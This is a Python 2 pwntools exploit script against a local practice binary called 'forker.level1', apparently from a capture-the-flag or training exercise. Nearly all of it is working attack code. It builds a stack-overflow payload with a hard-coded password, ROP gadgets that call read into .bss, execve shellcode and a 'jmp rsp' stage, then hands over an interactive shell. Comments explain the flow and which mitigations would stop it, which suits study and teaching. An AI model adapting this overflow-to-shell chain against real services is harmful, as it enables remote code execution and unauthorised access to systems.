#!/usr/bin/python
# coding: utf-8
"""Stack-overflow proof-of-concept against the local "forker.level1" exercise binary.

Written for pwntools under Python 2 (``print`` is used as a statement and the
payload is built as a ``str``); it will not run unmodified on Python 3. Flow:
read the prompt, send one oversized line that overwrites the saved return
address with a short ROP chain, send a second line that the chain's ``read``
call consumes, then hand the connection to the user.

Defender's reading: the hard-coded addresses below only hold if the binary
loads at a fixed address (presumably a non-PIE build), the final ``jmp rsp``
only works if the stack is executable (no NX), and overwriting the saved
return address only works if no stack canary sits between the buffer and it.
Any one of those three standard mitigations (PIE + ASLR, NX, -fstack-protector)
would break this script as written.
"""
from pwn import *  # pwntools: ELF, remote, p64, asm, context, pwnlib.shellcraft
context.arch = 'amd64'  # target is x86-64; selects the encoding used by asm() and shellcraft below
e = ELF("./forker.level1")  # parsed only for e.bss() and e.plt['read'] below
p = remote("localhost", 31337)  # local test instance of the service
# Hard-coded gadget addresses. The names suggest `pop rdi; ret` and
# `pop rsi; pop r15; ret` — confirm against the binary. Fixed addresses
# like these are only valid for a build without PIE.
rdiret = 0x0000000000400c13
rsir15ret = 0x0000000000400c11
print p.recvuntil("Password:")  # consume the prompt (Python 2 print statement)
payload = "INTERNET_FUNNY_MUNNY\x00"  # password followed by a NUL terminator
payload += "A" * (76 - len(payload))  # pad the buffer to 76 bytes
payload += "\x50"  # single byte at offset 76; its role is not evident from this script — TODO confirm against the stack layout
payload += "A" * 8 # RBP  (saved frame pointer, overwritten with filler)
# ROP chain laid over the saved return address. Read top-down it loads
# rdi=4 (presumably the client socket fd of the forked handler — confirm),
# rsi=e.bss() and r15=0, then returns into read@plt. The chain does not
# set rdx, so the length argument is whatever that register already holds.
payload += p64(rdiret)
payload += p64(4)
payload += p64(rsir15ret)
payload += p64(e.bss())
payload += p64(0)
payload += p64(e.plt['read'])
# Dead code: hand-written raw bytes, superseded by the shellcraft line below.
# shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
shellcode = pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 1, 'rsp', 2, 0).rstrip()  # pwntools helper emitting an execve syscall stub
payload += p64(e.bss())  # return address for read@plt: continue in .bss, i.e. in whatever the second sendline delivered
payload += shellcode  # sits just above that return address on the stack
p.sendline(payload)
p.sendline(asm("jmp rsp"))  # second line: consumed by the chain's read into .bss; jumps back into the stack-resident payload (needs an executable stack)
print p.recv(1024, timeout=0.5)  # drain whatever the service prints in response
p.interactive()  # hand the connection over to the user